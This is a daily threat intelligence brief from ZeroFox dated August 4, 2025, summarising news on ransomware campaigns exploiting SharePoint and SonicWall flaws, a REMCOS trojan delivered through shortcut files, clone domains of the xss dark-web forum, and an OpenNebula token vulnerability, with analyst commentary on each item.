ZeroFox Daily Intelligence Brief - August 4, 2025

ZeroFox Daily Intelligence Brief - August 4, 2025

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• Threat Actor Deploys Custom Infrastructure in Ransomware Attacks
• SonicWall Firewall Targeted in Ongoing Ransomware Attacks
• New Malware Campaign Exploits Shortcut Files to Hijack Systems

Threat Actor Deploys Custom Infrastructure in Ransomware Attacks

Source: https://thehackernews.com/2025/08/storm-2603-exploits-sharepoint-flaws-to.html

What we know: Storm-2603, a suspected China-based threat actor, has exploited CVE-2025-49706 and CVE-2025-49704 to deploy the Warlock ransomware strain using a custom command-and-control (C2) framework, AK47 C2.

Context: The actor, active since March 2025, has been targeting organizations in Latin America and Asia Pacific, while leveraging dual ransomware–Warlock and LockBit Black–payloads along with DNS-based backdoors and open-source tools.

Analyst note: The threat actor’s use of multiple ransomware strains could indicate an attempt to complicate incident response, obscure attribution, and evade detection. Additionally, the suspected China-linked actor is likely spying on corporate environments to exfiltrate sensitive information to advance their home-country’s geopolitical agenda.

SonicWall Firewall Targeted in Ongoing Ransomware Attacks

Source: https://www.bleepingcomputer.com/news/security/surge-of-akira-ransomware-attacks-hits-sonicwall-firewall-devices/

What we know: Akira ransomware group is suspected to be exploiting an unknown zero-day vulnerability in SonicWall firewall devices, as cyberattacks targeting the devices have increased since July 2025.

Context: Multiple ransomware intrusions have been reportedly observed attempting unauthorized access via SonicWall SSL VPN connections. However, cybersecurity researchers have not ruled out credential-based attacks.

Analyst note: Entities using SonicWall firewall devices are likely at risk of a larger network compromise if a zero-day vulnerability is indeed being exploited in the wild. Internal network resources like sensitive documents and applications are likely at risk of being stolen or encrypted in ransomware attacks.

New Malware Campaign Exploits Shortcut Files to Hijack Systems

Source: https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/

What we know: A deceptive malware campaign has been identified using malicious shortcut ([.]LNK) files on a popular desktop operating system to deliver the REMCOS remote-access trojan.

Context: The campaign begins with a fake purchase order shortcut file. It uses Base64 encoding and a disguised [.]PIF file to install REMCOS while avoiding detection by security tools.

Analyst note: REMCOS provides attackers with full remote access, enabling keylogging, file theft, and surveillance through webcams and microphones, likely leading to credential theft, espionage, or lateral movement within corporate networks. If left unchecked, it could further fuel ransomware attacks, corporate sabotage, or large-scale data breaches.

DEEP AND DARK WEB INTELLIGENCE

Xss’s alleged new domain emerges: At least one new domain claiming to be operated by an xss admin, xss[.]pro, has emerged on the dark web after the recent law enforcement takedown. “Admin” claimed that multiple security issues with the original xss domain have been addressed in xss[.]pro. They also claimed that another site, named DamageLib, was spreading lies that xss is a honeypot. Several clone domains of xss are very likely to emerge in the following weeks, each claiming to be operated by the original xss admins. Some domains are likely to be listed for sale, though their legitimacy cannot be verified.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CVE-2025-54955: This vulnerability enables an unauthenticated attacker to exploit a timing issue and obtain a valid JSON Web Token (JWT) belonging to a legitimate user, all without needing their credentials. With access to a valid JWT, an attacker can impersonate users, gain unauthorized access to the system, and potentially take full control of accounts, likely leading to data breaches, privilege escalation, and widespread compromise of cloud resources managed by OpenNebula.

Affected products: OpenNebula Community Edition (CE) version before 7.0.0 and Enterprise Edition (EE) version before 6.10.3